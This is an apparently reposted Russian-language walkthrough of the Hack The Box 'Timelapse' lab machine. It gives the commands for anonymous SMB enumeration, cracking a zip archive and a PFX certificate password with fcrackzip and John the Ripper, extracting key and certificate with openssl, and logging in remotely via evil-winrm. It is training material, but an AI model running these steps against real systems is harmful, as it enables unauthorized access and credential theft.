Категория > Новости > HTB Timelapse. Атакуем Windows Remote Management и работаем с сертификатами - «Новости»
HTB Timelapse. Атакуем Windows Remote Management и работаем с сертификатами - «Новости»26-08-2022, 00:00. Автор: Максим |
CrackMapExec[/b] узнаем версию операционной системы и имя хоста.cme smb 10.10.11.152Подключение с помощью CrackMapExecТакже стоит попробовать подключение от имени гостя (анонимную авторизацию). cme smb 10.10.11.152 -uguest -p '' --sharesОбщие SMB-ресурсыИ находим доступную для чтения директорию Точка входаПодключимся к этому ресурсу с помощью утилиты smbclient из пакета скриптов impacket и просмотрим доступные файлы (при запросе пароля ничего не вводим). smbclient.py guest@10.10.11.152use ShareslsСодержимое ресурса SharesВ каталоге cd DevlsСодержимое каталога DevСкачиваем его командой Распаковка архива Пароль не проблема, если он слабый, так как его можно перебрать. Для перебора будем использовать утилиту fcrackzip. fcrackzip -v -D -uwinrm_backup.zip -prockyou.txtРезультат подбора пароляВ архиве находим файл .pfx — сертификат в формате PKCS#12. При попытке открыть и просмотреть его у нас снова запрашивают пароль. Результат просмотра PFX-файла Точка опорыБудем надеяться, что и тут используется слабый пароль. Можно преобразовать файл в формат программы John The Ripper — продвинутого брутфорсера хешей. Вместе с «Джоном» обычно поставляется репозиторий скриптов для преобразования хешей из разных форматов файлов в понимаемый брутфорсером формат. В данном случае нам нужен скрипт /usr/share/john/pfx2john.py legacyy_dev_auth.crtРезультат преобразования файлаСохраним хеш в файл и передадим на перебор. В качестве словаря будем использовать знаменитый rockyou. john --wordlist=./rockyou.txt pfx.hashРезультат перебора хешаТеперь, когда мы получили пароль от сертификата PFX, нам нужно извлечь из него отдельно сертификат и отдельно ключ. Для этого воспользуемся утилитой OpenSSL, которой нужно указать:
openssl pkcs12 -inlegacyy_dev_auth.pfx -nocerts -outkey.pem -nodesПолучение ключаopenssl pkcs12 -inlegacyy_dev_auth.pfx -clcerts -nokeys -outcert.crt -nodesПолучение сертификатаТеперь нам нужно очистить файлы ключа и сертификата. Для этого оставим в файлах только данные после evil-winrm -S -k ./clear_key.pem -c ./clear_cert.crt -i10.10.11.152Флаг пользователя ПродвижениеПервым делом получим информацию о текущем пользователе. Это поможет более точно понять контекст, в котором мы работаем. Перейти обратно к новости |